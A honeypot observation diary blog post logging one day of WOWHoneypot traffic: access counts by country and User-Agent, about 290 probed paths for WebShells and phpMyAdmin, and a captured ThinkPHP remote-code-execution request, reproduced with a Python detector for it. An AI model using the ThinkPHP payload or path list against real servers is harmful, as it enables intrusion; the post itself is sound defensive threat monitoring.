cute_otter’s blog

I keep a honeypot observation diary

Honeypot Observation Diary (2019/02/14)

WOWHoneypot

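This is a brief analysis of the logs captured by the honeypot "WOWHoneypot" on 2019/02/14 (Thu) 00:00~23:59 UTC (day 42 of operation).

Highlights

  • Observed three bursts of access centered on probing for WebShells, phpMyAdmin and the like.
  • Observed two attacks exploiting the ThinkPHP vulnerability, the first in 27 days (since 2019/01/18).
  • Observed probing for Adobe ColdFusion, the first in 15 days (since 2019/01/30).
  • Observed ZGrab scans for the fifth consecutive day.
  • Observed a MASSCAN scan, the first in 9 days (since 2019/02/05).

Overview

  • Aggregation period: 2019/02/14 (Thu) 00:00~23:59 UTC
  • Total accesses: 752 (+713 from the previous day)
  • Unique IP addresses: 23 (+-0 from the previous day)
  • Source countries: 12 (-2 from the previous day)

Accesses by country

The number of accesses per country was as follows.

Rank Country Count Previous rank Previous count Difference Remarks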
1. China 545 - 0 +545 -
2. Italy 185 13. 1 +184 -
3. United States 6 3. 4 +2 -
4. Brazil 4 2. 5 -1 -
5. France 3 - 0 +3 -
6. Poland 2 - 0 +2 -
7. Nigeria 2 - 0 +2 -
8. South Africa 1 - 0 +1 -
9. Japan 1 - 0 +1 -
10. India 1 4. 2 -1 -
11. Cambodia 1 12. 1 +-0 -
12. Bangladesh 1 6. 1 +-0 -

User-Agent

The User-Agent values included in the HTTP requests were as follows.

Rank User-Agent Count Previous rank Previous count Difference Remarks
1. Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) 238 - 0 +238 Used only for WebShell probing
2. Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.91 Safari/537.36 126 - 0 +126 Used mainly for WebShell and phpMyAdmin probing
3. Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0 77 - 0 +77 Used mainly for phpMyAdmin probing
4. Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 62 - 0 +62 Used only for WebShell probing
5. Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:47.0) Gecko/20100101 Firefox/47.0 61 - 0 +61 Used mainly for phpMyAdmin probing
6. Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0) 58 - 0 +58 Used only for WebShell probing
7. Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0 43 - 0 +43 Used for probing WebShells, phpMyAdmin, etc.
8. Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36 29 - 0 +29 Used mainly for WebShell and phpMyAdmin probing
9. Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0 10 - 0 +10 Used only for login attempts against the Tomcat manager page
10. Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0 9 - 0 +9 Used only for login attempts against the Tomcat manager page
11. Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0) 9 - 0 +9 Used only for login attempts against the Tomcat manager page
12. (not set) 5 7. 1 +4 -
13. Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 5 - 0 +5 -
14. Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36 4 3. 4 +-0 -
15. Mozilla/5.0 3 - 0 +3 Used only for WebDAV probing
16. Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6) 3 - 0 +3 Used mainly for ThinkPHP probing and attacks exploiting its vulnerability
17. Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36 2 4. 4 -2 -
18. Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 2 2. 7 -5 -
19. Mozilla/5.0 zgrab/0.x 1 5. 3 -2 ZGrab scan
20. Go-http-client/1.1 1 - 0 +1 Used only for the attack exploiting the ThinkPHP vulnerability
21. HTTP Banner Detection (https://security.ipip.net) 1 - 0 +1 -
22. masscan/1.0 (https://github.com/robertdavidgraham/masscan) 1 - 0 +1 MASSCAN scan
23. Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36 1 - 0 +1 -
24. Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 1 - 0 +1 -

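Access targets

  • Observed three bursts of access centered on probing for WebShells, phpMyAdmin and the like.
  • Observed two attacks exploiting the ThinkPHP vulnerability, the first in 27 days (since 2019/01/18).
    • One of them used the POST method; this is the first time I have observed an attack using a POST request.
  • Observed probing for Adobe ColdFusion, the first in 15 days (since 2019/01/30).
  • Observed ZGrab scans for the fifth consecutive day.
    • There was 1 request.
    • The User-Agent was Mozilla/5.0 zgrab/0.x.
    • The source IP address was registered to University of Michigan (AS36375).
  • Observed a MASSCAN scan, the first in 9 days (since 2019/02/05).
    • There was 1 request.
    • The User-Agent was masscan/1.0 (https://github.com/robertdavidgraham/masscan).
    • The source IP address was registered to DigitalOcean, LLC (AS14061).

Attack exploiting the ThinkPHP vulnerability

For the first time, I observed an attack targeting the ThinkPHP vulnerability that used the POST method.
It attempted to execute the uname and ipconfig commands.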

POST /TP/public/index.php?s=captcha HTTP/1.1
Host: xxx.xxx.xxx.xxx
User-Agent: Go-http-client/1.1
Content-Length: 84
Connection: close
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=uname&ipconfig
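
The two ThinkPHP request shapes seen on this day (the POST above and the GET listed in the access table below) can be recognised from the request alone. The following is an added example, not part of the original post or of WOWHoneypot; the function name `detect_thinkphp` and the result field names are assumptions. It also shows how a form parser splits the POST body at the unencoded `&`.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed samples, copied from the two ThinkPHP requests quoted in this post.
GET_TARGET = (r"/TP/public/index.php?s=index/\think\app/invokefunction"
              r"&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1")
POST_TARGET = "/TP/public/index.php?s=captcha"
POST_BODY = ("_method=__construct&filter[]=system&method=get"
             "&server[REQUEST_METHOD]=uname&ipconfig")


def detect_thinkphp(method, target, body=""):
    """Return details of a ThinkPHP code-execution attempt, or None if no match."""
    query = parse_qsl(urlsplit(target).query, keep_blank_values=True)
    route = dict(query).get("s", "")

    # Shape 1: the route names \think\<class>/invokefunction and the query
    # supplies the callable (vars[0]) and its argument (vars[1][]).
    if re.search(r"\\think\\\w+/invokefunction", route, re.IGNORECASE):
        args = [v for k, v in query if k.startswith("vars[")]
        return {"variant": "invokefunction",
                "callable": args[0] if args else None,
                "argument": args[1] if len(args) > 1 else None,
                "stray_fields": []}

    # Shape 2: a form body with _method=__construct that overwrites request
    # properties; filter[] names the callable, server[REQUEST_METHOD] its argument.
    if method.upper() == "POST":
        form = parse_qsl(body, keep_blank_values=True)
        fields = dict(form)
        if fields.get("_method") == "__construct" and "filter[]" in fields:
            known = {"_method", "filter[]", "method", "server[REQUEST_METHOD]"}
            return {"variant": "construct-override",
                    "callable": fields["filter[]"],
                    "argument": fields.get("server[REQUEST_METHOD]"),
                    # An unencoded '&' ends the value, so whatever follows it
                    # arrives as a separate, empty form field.
                    "stray_fields": [k for k, _ in form if k not in known]}
    return None


if __name__ == "__main__":
    samples = [("GET", GET_TARGET, ""), ("POST", POST_TARGET, POST_BODY),
               ("GET", "/manager/html", "")]
    for m, t, b in samples:
        print(m, t.split("?")[0], "->", detect_thinkphp(m, t, b))
```

For the POST above, the result reports `system` as the callable, `uname` as its argument, and `ipconfig` as a stray field.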

Access of unknown intent

A single IP address accessed only this path.
Could this also be WebShell probing?

GET /825256118F24664C77F161AB6ADA62D7.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36
Host: xxx.xxx.xxx.xxx
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive

List of access targets

The list of access targets is as follows.

Rank Remarks Access target Count Previous rank Previous count Difference
1. Login attempt against the Tomcat manager page GET /manager/html HTTP/1.1 28 - 0 +28
2. Access to the top page GET / HTTP/1.1 16 1. 21 -5
3. WebShell probing POST /qq.php HTTP/1.1 10 - 0 +10
4. WebShell probing GET /cmd.php HTTP/1.1 6 - 0 +6
5. WebShell probing POST /xx.php HTTP/1.1 6 - 0 +6
6. phpMyAdmin probing GET /PMA/index.php HTTP/1.1 6 - 0 +6
7. phpMyAdmin probing GET /web/phpMyAdmin/index.php HTTP/1.1 6 - 0 +6
8. phpMyAdmin probing GET /admin/pma/index.php HTTP/1.1 6 - 0 +6
9. phpMyAdmin probing GET /xampp/phpmyadmin/index.php HTTP/1.1 6 - 0 +6
10. phpMyAdmin probing GET /tools/phpMyAdmin/index.php HTTP/1.1 6 - 0 +6
11. phpMyAdmin probing GET /MyAdmin/index.php HTTP/1.1 6 - 0 +6
12. WebShell probing GET /shell.php HTTP/1.1 5 - 0 +5
13. WebShell probing POST /conflg.php HTTP/1.1 5 - 0 +5
14. WebShell probing POST /q.php HTTP/1.1 5 - 0 +5
15. WebShell probing POST /1.php HTTP/1.1 5 - 0 +5
16. phpMyAdmin probing GET /admin/PMA/index.php HTTP/1.1 5 - 0 +5
17. phpMyAdmin probing GET /www/phpMyAdmin/index.php HTTP/1.1 5 - 0 +5
18. phpMyAdmin probing GET /typo3/phpmyadmin/index.php HTTP/1.1 5 - 0 +5
19. phpMyAdmin probing GET /phpMyAdmin/phpMyAdmin/index.php HTTP/1.1 5 - 0 +5
20. WebShell probing POST /test.php HTTP/1.1 4 - 0 +4
21. WebShell probing POST /confg.php HTTP/1.1 4 - 0 +4
22. WebShell probing POST /x.php HTTP/1.1 4 - 0 +4
23. phpMyAdmin probing GET /pma/index.php HTTP/1.1 4 - 0 +4
24. phpMyAdmin probing GET /admin/phpmyadmin/index.php HTTP/1.1 4 - 0 +4
25. phpMyAdmin probing GET /admin/phpMyAdmin/index.php HTTP/1.1 4 - 0 +4
26. phpMyAdmin probing GET /claroline/phpMyAdmin/index.php HTTP/1.1 4 - 0 +4
27. phpMyAdmin probing GET /phpmyadmin/phpmyadmin/index.php HTTP/1.1 4 - 0 +4
28. Attack exploiting the Microsoft IIS 6.0 vulnerability (CVE-2017-7269) PROPFIND / HTTP/1.1 3 - 0 +3
29. WebDAV probing GET /webdav/ HTTP/1.1 3 - 0 +3
30. WebShell probing GET /java.php HTTP/1.1 3 - 0 +3
31. WebShell probing GET /_query.php HTTP/1.1 3 - 0 +3
32. WebShell probing GET /test.php HTTP/1.1 3 - 0 +3
33. WebShell probing GET /db_cts.php HTTP/1.1 3 - 0 +3
34. WebShell probing GET /logon.php HTTP/1.1 3 - 0 +3
35. WebShell probing GET /license.php HTTP/1.1 3 - 0 +3
36. WebShell probing GET /log.php HTTP/1.1 3 - 0 +3
37. WebShell probing GET /hell.php HTTP/1.1 3 - 0 +3
38. WebShell probing GET /pmd_online.php HTTP/1.1 3 - 0 +3
39. WebShell probing GET /x.php HTTP/1.1 3 - 0 +3
40. WebShell probing GET /htdocs.php HTTP/1.1 3 - 0 +3
41. WebShell probing GET /desktop.ini.php HTTP/1.1 3 - 0 +3
42. WebShell probing GET /cmdd.php HTTP/1.1 3 - 0 +3
43. WebShell probing GET /knal.php HTTP/1.1 3 - 0 +3
44. WebShell probing GET /appserv.php HTTP/1.1 3 - 0 +3
45. phpMyAdmin probing GET /scripts/setup.php HTTP/1.1 3 - 0 +3
46. phpMyAdmin probing GET /phpMyAdmin/scripts/setup.php HTTP/1.1 3 - 0 +3
47. phpMyAdmin probing GET /phpMyAdmin/scripts/db___.init.php HTTP/1.1 3 - 0 +3
48. Network Weathermap probing GET /plugins/weathermap/editor.php HTTP/1.1 3 - 0 +3
49. Network Weathermap probing GET /cacti/plugins/weathermap/editor.php HTTP/1.1 3 - 0 +3
50. WebShell probing POST /s.php HTTP/1.1 3 - 0 +3
51. WebShell probing POST /w.php HTTP/1.1 3 - 0 +3
52. WebShell probing POST /sheep.php HTTP/1.1 3 - 0 +3
53. WebShell probing POST /qaq.php HTTP/1.1 3 - 0 +3
54. WebShell probing POST /db_session.init.php HTTP/1.1 3 - 0 +3
55. WebShell probing POST /db__.init.php HTTP/1.1 3 - 0 +3
56. WebShell probing POST /m.php?pbid=open HTTP/1.1 3 - 0 +3
57. WebShell probing POST /db_dataml.php HTTP/1.1 3 - 0 +3
58. WebShell probing POST /db_desql.php HTTP/1.1 3 - 0 +3
59. WebShell probing POST /wshell.php HTTP/1.1 3 - 0 +3
60. WebShell probing POST /xshell.php HTTP/1.1 3 - 0 +3
61. WebShell probing POST /lindex.php HTTP/1.1 3 - 0 +3
62. WebShell probing POST /phpstudy.php HTTP/1.1 3 - 0 +3
63. WebShell probing POST /phpStudy.php HTTP/1.1 3 - 0 +3
64. WebShell probing POST /weixiao.php HTTP/1.1 3 - 0 +3
65. WebShell probing POST /feixiang.php HTTP/1.1 3 - 0 +3
66. WebShell probing POST /ak48.php HTTP/1.1 3 - 0 +3
67. WebShell probing POST /xiao.php HTTP/1.1 3 - 0 +3
68. WebShell probing POST /defect.php HTTP/1.1 3 - 0 +3
69. WebShell probing POST /webslee.php HTTP/1.1 3 - 0 +3
70. WebShell probing POST /pe.php HTTP/1.1 3 - 0 +3
71. WebShell probing POST /hm.php HTTP/1.1 3 - 0 +3
72. WebShell probing POST /cainiao.php HTTP/1.1 3 - 0 +3
73. WebShell probing POST /zuoshou.php HTTP/1.1 3 - 0 +3
74. WebShell probing POST /zuo.php HTTP/1.1 3 - 0 +3
75. WebShell probing POST /aotu.php HTTP/1.1 3 - 0 +3
76. WebShell probing POST /aotu7.php HTTP/1.1 3 - 0 +3
77. WebShell probing POST /cmd.php HTTP/1.1 3 - 0 +3
78. WebShell probing POST /system.php HTTP/1.1 3 - 0 +3
79. WebShell probing POST /l6.php HTTP/1.1 3 - 0 +3
80. WebShell probing POST /l8.php HTTP/1.1 3 - 0 +3
81. WebShell probing POST /56.php HTTP/1.1 3 - 0 +3
82. WebShell probing POST /mz.php HTTP/1.1 3 - 0 +3
83. WebShell probing POST /yumo.php HTTP/1.1 3 - 0 +3
84. WebShell probing POST /min.php HTTP/1.1 3 - 0 +3
85. WebShell probing POST /wan.php HTTP/1.1 3 - 0 +3
86. WebShell probing POST /wanan.php HTTP/1.1 3 - 0 +3
87. WebShell probing POST /ssaa.php HTTP/1.1 3 - 0 +3
88. WebShell probing POST /12.php HTTP/1.1 3 - 0 +3
89. WebShell probing POST /hh.php HTTP/1.1 3 - 0 +3
90. WebShell probing POST /ak.php HTTP/1.1 3 - 0 +3
91. WebShell probing POST /ip.php HTTP/1.1 3 - 0 +3
92. WebShell probing POST /infoo.php HTTP/1.1 3 - 0 +3
93. WebShell probing POST /qwe.php HTTP/1.1 3 - 0 +3
94. phpMyAdmin probing GET /phpmyadmin/index.php HTTP/1.1 3 - 0 +3
95. phpMyAdmin probing GET /PMA2/index.php HTTP/1.1 3 - 0 +3
96. phpMyAdmin probing GET /pmamy2/index.php HTTP/1.1 3 - 0 +3
97. phpMyAdmin probing GET /mysql/index.php HTTP/1.1 3 - 0 +3
98. phpMyAdmin probing GET /admin/index.php HTTP/1.1 3 - 0 +3
99. phpMyAdmin probing GET /admin/mysql/index.php HTTP/1.1 3 - 0 +3
100. phpMyAdmin probing GET /admin/mysql2/index.php HTTP/1.1 3 - 0 +3
101. phpMyAdmin probing GET /admin/phpmyadmin2/index.php HTTP/1.1 3 - 0 +3
102. phpMyAdmin probing GET /mysqladmin/index.php HTTP/1.1 3 - 0 +3
103. phpMyAdmin probing GET /mysql_admin/index.php HTTP/1.1 3 - 0 +3
104. phpMyAdmin probing GET /phpadmin/index.php HTTP/1.1 3 - 0 +3
105. phpMyAdmin probing GET /phpAdmin/index.php HTTP/1.1 3 - 0 +3
106. phpMyAdmin probing GET /phpmyadmin0/index.php HTTP/1.1 3 - 0 +3
107. phpMyAdmin probing GET /phpMyAdmin-4.4.0/index.php HTTP/1.1 3 - 0 +3
108. phpMyAdmin probing GET /phpMyadmin_bak/index.php HTTP/1.1 3 - 0 +3
109. phpMyAdmin probing GET /phpmyadmin-old/index.php HTTP/1.1 3 - 0 +3
110. phpMyAdmin probing GET /phpMyAdminold/index.php HTTP/1.1 3 - 0 +3
111. phpMyAdmin probing GET /phpMyAdmin.old/index.php HTTP/1.1 3 - 0 +3
112. phpMyAdmin probing GET /pma-old/index.php HTTP/1.1 3 - 0 +3
113. phpMyAdmin probing GET /phpma/index.php HTTP/1.1 3 - 0 +3
114. phpMyAdmin probing GET /phpMyAbmin/index.php HTTP/1.1 3 - 0 +3
115. phpMyAdmin probing GET /phpMyAdmin__/index.php HTTP/1.1 3 - 0 +3
116. phpMyAdmin probing GET /phpMyAdmin+++---/index.php HTTP/1.1 3 - 0 +3
117. phpMyAdmin probing GET /phpmyadm1n/index.php HTTP/1.1 3 - 0 +3
118. phpMyAdmin probing GET /phpMyAdm1n/index.php HTTP/1.1 3 - 0 +3
119. phpMyAdmin probing GET /shaAdmin/index.php HTTP/1.1 3 - 0 +3
120. phpMyAdmin probing GET /phpMyadmi/index.php HTTP/1.1 3 - 0 +3
121. phpMyAdmin probing GET /phpMyAdmion/index.php HTTP/1.1 3 - 0 +3
122. phpMyAdmin probing GET /phpMyAdmin1/index.php HTTP/1.1 3 - 0 +3
123. phpMyAdmin probing GET /phpMyAdmin123/index.php HTTP/1.1 3 - 0 +3
124. phpMyAdmin probing GET /pwd/index.php HTTP/1.1 3 - 0 +3
125. phpMyAdmin probing GET /phpMyAdmina/index.php HTTP/1.1 3 - 0 +3
126. phpMyAdmin probing GET /phpMydmin/index.php HTTP/1.1 3 - 0 +3
127. phpMyAdmin probing GET /program/index.php HTTP/1.1 3 - 0 +3
128. phpMyAdmin probing GET /shopdb/index.php HTTP/1.1 3 - 0 +3
129. phpMyAdmin probing GET /phppma/index.php HTTP/1.1 3 - 0 +3
130. phpMyAdmin probing GET /phpmy/index.php HTTP/1.1 3 - 0 +3
131. phpMyAdmin probing GET /mysql/admin/index.php HTTP/1.1 3 - 0 +3
132. phpMyAdmin probing GET /mysql/dbadmin/index.php HTTP/1.1 3 - 0 +3
133. phpMyAdmin probing GET /mysql/mysqlmanager/index.php HTTP/1.1 3 - 0 +3
134. Attack exploiting the Portable phpMyAdmin for WordPress vulnerability (CVE-2012-5469) GET /wp-content/plugins/portable-phpmyadmin/wp-pma-mod/index.php HTTP/1.1 3 - 0 +3
135. WebShell probing GET /help.php HTTP/1.1 2 - 0 +2
136. phpMyAdmin probing GET /db_pma.php HTTP/1.1 2 - 0 +2
137. WebShell probing GET /help-e.php HTTP/1.1 2 - 0 +2
138. WebShell probing GET /z.php HTTP/1.1 2 - 0 +2
139. WebShell probing GET /lala.php HTTP/1.1 2 - 0 +2
140. WebShell probing GET /lala-dpr.php HTTP/1.1 2 - 0 +2
141. WebShell probing GET /wpc.php HTTP/1.1 2 - 0 +2
142. WebShell probing GET /wpo.php HTTP/1.1 2 - 0 +2
143. WebShell probing GET /text.php HTTP/1.1 2 - 0 +2
144. WebShell probing GET /muhstik.php HTTP/1.1 2 - 0 +2
145. WebShell probing GET /muhstik2.php HTTP/1.1 2 - 0 +2
146. WebShell probing GET /muhstiks.php HTTP/1.1 2 - 0 +2
147. WebShell probing GET /muhstik-dpr.php HTTP/1.1 2 - 0 +2
148. WebShell probing GET /lol.php HTTP/1.1 2 - 0 +2
149. WebShell probing GET /uploader.php HTTP/1.1 2 - 0 +2
150. WebShell probing GET /cmv.php HTTP/1.1 2 - 0 +2
151. phpMyAdmin probing GET /phpmyadmin/scripts/setup.php HTTP/1.1 2 - 0 +2
152. phpMyAdmin probing GET /phpmyadmin/scripts/db___.init.php HTTP/1.1 2 - 0 +2
153. WebShell probing POST /wuwu11.php HTTP/1.1 2 - 0 +2
154. WebShell probing POST /xw.php HTTP/1.1 2 - 0 +2
155. WebShell probing POST /xw1.php HTTP/1.1 2 - 0 +2
156. WebShell probing POST /9678.php HTTP/1.1 2 - 0 +2
157. WebShell probing POST /wc.php HTTP/1.1 2 - 0 +2
158. WebShell probing POST /db.init.php HTTP/1.1 2 - 0 +2
159. WebShell probing POST /wp-admins.php HTTP/1.1 2 - 0 +2
160. WebShell probing POST /mx.php HTTP/1.1 2 - 0 +2
161. WebShell probing POST /ak47.php HTTP/1.1 2 - 0 +2
162. WebShell probing POST /yao.php HTTP/1.1 2 - 0 +2
163. WebShell probing POST /bak.php HTTP/1.1 2 - 0 +2
164. WebShell probing POST /l7.php HTTP/1.1 2 - 0 +2
165. WebShell probing POST /aw.php HTTP/1.1 2 - 0 +2
166. WebShell probing POST /1213.php HTTP/1.1 2 - 0 +2
167. WebShell probing POST /post.php HTTP/1.1 2 - 0 +2
168. WebShell probing POST /aaaa.php HTTP/1.1 2 - 0 +2
169. WebShell probing POST /h1.php HTTP/1.1 2 - 0 +2
170. WebShell probing POST /2.php HTTP/1.1 2 - 0 +2
171. WebShell probing POST /z.php HTTP/1.1 2 - 0 +2
172. WebShell probing POST /api.php HTTP/1.1 2 - 0 +2
173. WebShell probing POST /hello.php HTTP/1.1 2 - 0 +2
174. WebShell probing POST /lucky.php HTTP/1.1 2 - 0 +2
175. WebShell probing POST /MCLi.php HTTP/1.1 2 - 0 +2
176. WebShell probing POST /zxc1.php HTTP/1.1 2 - 0 +2
177. WebShell probing POST /test123.php HTTP/1.1 2 - 0 +2
178. WebShell probing POST /paylog.php HTTP/1.1 2 - 0 +2
179. phpMyAdmin probing GET /index.php HTTP/1.1 2 - 0 +2
180. phpMyAdmin probing GET /phpMyAdmin/index.php HTTP/1.1 2 - 0 +2
181. phpMyAdmin probing GET /pmd/index.php HTTP/1.1 2 - 0 +2
182. phpMyAdmin probing GET /pmamy/index.php HTTP/1.1 2 - 0 +2
183. phpMyAdmin probing GET /db/index.php HTTP/1.1 2 - 0 +2
184. phpMyAdmin probing GET /dbadmin/index.php HTTP/1.1 2 - 0 +2
185. phpMyAdmin probing GET /mysql-admin/index.php HTTP/1.1 2 - 0 +2
186. phpMyAdmin probing GET /phpmyadmin1/index.php HTTP/1.1 2 - 0 +2
187. phpMyAdmin probing GET /phpmyadmin2/index.php HTTP/1.1 2 - 0 +2
188. phpMyAdmin probing GET /myadmin/index.php HTTP/1.1 2 - 0 +2
189. phpMyAdmin probing GET /myadmin2/index.php HTTP/1.1 2 - 0 +2
190. phpMyAdmin probing GET /v/index.php HTTP/1.1 2 - 0 +2
191. WebShell probing GET /cmx.php HTTP/1.1 2 - 0 +2
192. Access to the top page GET / HTTP/1.0 2 - 0 +2
193. Adobe ColdFusion probing GET /CFIDE/administrator/ HTTP/1.1 2 - 0 +2
194. WordPress config file probing GET /wp-config.php HTTP/1.1 1 - 0 +1
195. WebShell probing POST /3.php HTTP/1.1 1 - 0 +1
196. WebShell probing POST /phpinfi.php HTTP/1.1 1 - 0 +1
197. WebShell probing POST /9510.php HTTP/1.1 1 - 0 +1
198. WebShell probing POST /python.php HTTP/1.1 1 - 0 +1
199. WebShell probing POST /default.php HTTP/1.1 1 - 0 +1
200. WebShell probing POST /sean.php HTTP/1.1 1 - 0 +1
201. WebShell probing POST /app.php HTTP/1.1 1 - 0 +1
202. WebShell probing POST /help.php HTTP/1.1 1 - 0 +1
203. WebShell probing POST /tiandi.php HTTP/1.1 1 - 0 +1
204. WebShell probing POST /miao.php HTTP/1.1 1 - 0 +1
205. WebShell probing POST /xz.php HTTP/1.1 1 - 0 +1
206. WebShell probing POST /linuxse.php HTTP/1.1 1 - 0 +1
207. WebShell probing POST /zuoindex.php HTTP/1.1 1 - 0 +1
208. WebShell probing POST /zshmindex.php HTTP/1.1 1 - 0 +1
209. WebShell probing POST /tomcat.php HTTP/1.1 1 - 0 +1
210. WebShell probing POST /ceshi.php HTTP/1.1 1 - 0 +1
211. WebShell probing POST /1hou.php HTTP/1.1 1 - 0 +1
212. WebShell probing POST /ou2.php HTTP/1.1 1 - 0 +1
213. WebShell probing POST /zuos.php HTTP/1.1 1 - 0 +1
214. WebShell probing POST /zuoss.php HTTP/1.1 1 - 0 +1
215. WebShell probing POST /zuoshss.php HTTP/1.1 1 - 0 +1
216. WebShell probing POST /boots.php HTTP/1.1 1 - 0 +1
217. WebShell probing POST /she.php HTTP/1.1 1 - 0 +1
218. WebShell probing POST /qw.php HTTP/1.1 1 - 0 +1
219. WebShell probing POST /caonma.php HTTP/1.1 1 - 0 +1
220. WebShell probing POST /wcp.php HTTP/1.1 1 - 0 +1
221. WebShell probing POST /u.php HTTP/1.1 1 - 0 +1
222. WebShell probing POST /uuu.php HTTP/1.1 1 - 0 +1
223. WebShell probing POST /sss.php HTTP/1.1 1 - 0 +1
224. WebShell probing POST /core.php HTTP/1.1 1 - 0 +1
225. WebShell probing POST /qaz.php HTTP/1.1 1 - 0 +1
226. WebShell probing POST /sha.php HTTP/1.1 1 - 0 +1
227. WebShell probing POST /ppx.php HTTP/1.1 1 - 0 +1
228. WebShell probing POST /conf1g.php HTTP/1.1 1 - 0 +1
229. WebShell probing POST /ver.php HTTP/1.1 1 - 0 +1
230. WebShell probing POST /hack.php HTTP/1.1 1 - 0 +1
231. WebShell probing POST /qa.php HTTP/1.1 1 - 0 +1
232. WebShell probing POST /Ss.php HTTP/1.1 1 - 0 +1
233. WebShell probing POST /xxx.php HTTP/1.1 1 - 0 +1
234. WebShell probing POST /92.php HTTP/1.1 1 - 0 +1
235. WebShell probing POST /dexgp.php HTTP/1.1 1 - 0 +1
236. WebShell probing POST /nuoxi.php HTTP/1.1 1 - 0 +1
237. WebShell probing POST /godkey.php HTTP/1.1 1 - 0 +1
238. WebShell probing POST /okokok.php HTTP/1.1 1 - 0 +1
239. WebShell probing POST /erwa.php HTTP/1.1 1 - 0 +1
240. WebShell probing POST /pma.php HTTP/1.1 1 - 0 +1
241. WebShell probing POST /ruyi.php HTTP/1.1 1 - 0 +1
242. WebShell probing POST /51314.php HTTP/1.1 1 - 0 +1
243. WebShell probing POST /5201314.php HTTP/1.1 1 - 0 +1
244. WebShell probing POST /fusheng.php HTTP/1.1 1 - 0 +1
245. WebShell probing POST /general.php HTTP/1.1 1 - 0 +1
246. WebShell probing POST /repeat.php HTTP/1.1 1 - 0 +1
247. WebShell probing POST /ldw.php HTTP/1.1 1 - 0 +1
248. WebShell probing POST /s1.php HTTP/1.1 1 - 0 +1
249. WebShell probing POST /xiaodai.php HTTP/1.1 1 - 0 +1
250. WebShell probing POST /admn.php HTTP/1.1 1 - 0 +1
251. WebShell probing POST /hell.php HTTP/1.1 1 - 0 +1
252. WebShell probing POST /xp.php HTTP/1.1 1 - 0 +1
253. WebShell probing POST /p.php HTTP/1.1 1 - 0 +1
254. WebShell probing POST /a.php HTTP/1.1 1 - 0 +1
255. WebShell probing POST /m.php HTTP/1.1 1 - 0 +1
256. WebShell probing POST /conf.php HTTP/1.1 1 - 0 +1
257. WebShell probing POST /123.php HTTP/1.1 1 - 0 +1
258. WebShell probing POST /HX.php HTTP/1.1 1 - 0 +1
259. WebShell probing POST /666.php HTTP/1.1 1 - 0 +1
260. WebShell probing POST /777.php HTTP/1.1 1 - 0 +1
261. WebShell probing POST /qwq.php HTTP/1.1 1 - 0 +1
262. WebShell probing POST /qwqw.php HTTP/1.1 1 - 0 +1
263. WebShell probing POST /.php HTTP/1.1 1 - 0 +1
264. WebShell probing POST /infos.php HTTP/1.1 1 - 0 +1
265. WebShell probing POST /htfr.php HTTP/1.1 1 - 0 +1
266. WebShell probing POST /zzk.php HTTP/1.1 1 - 0 +1
267. WebShell probing POST /toor.php HTTP/1.1 1 - 0 +1
268. WebShell probing POST /uu.php HTTP/1.1 1 - 0 +1
269. WebShell probing POST /aa.php HTTP/1.1 1 - 0 +1
270. WebShell probing POST /wb.php HTTP/1.1 1 - 0 +1
271. WebShell probing POST /yj.php HTTP/1.1 1 - 0 +1
272. WebShell probing POST /7.php HTTP/1.1 1 - 0 +1
273. WebShell probing POST /xiaoma.php HTTP/1.1 1 - 0 +1
274. WebShell probing POST /xiaomae.php HTTP/1.1 1 - 0 +1
275. WebShell probing POST /xiaomar.php HTTP/1.1 1 - 0 +1
276. WebShell probing POST /data.php HTTP/1.1 1 - 0 +1
277. WebShell probing POST /log.php HTTP/1.1 1 - 0 +1
278. WebShell probing POST /fack.php HTTP/1.1 1 - 0 +1
279. WebShell probing POST /angge.php HTTP/1.1 1 - 0 +1
280. WebShell probing POST /cxfm666.php HTTP/1.1 1 - 0 +1
281. WebShell probing POST /db.php HTTP/1.1 1 - 0 +1
282. WebShell probing POST /hacly.php HTTP/1.1 1 - 0 +1
283. WebShell probing POST /xiaomo.php HTTP/1.1 1 - 0 +1
284. WebShell probing POST /xiaoyu.php HTTP/1.1 1 - 0 +1
285. WebShell probing POST /xiaohei.php HTTP/1.1 1 - 0 +1
286. WebShell probing POST /j.php HTTP/1.1 1 - 0 +1
287. WebShell probing POST /qq5262.php HTTP/1.1 1 - 0 +1
288. WebShell probing POST /lost.php HTTP/1.1 1 - 0 +1
289. WebShell probing POST /php.php HTTP/1.1 1 - 0 +1
290. WebShell probing POST /win.php HTTP/1.1 1 - 0 +1
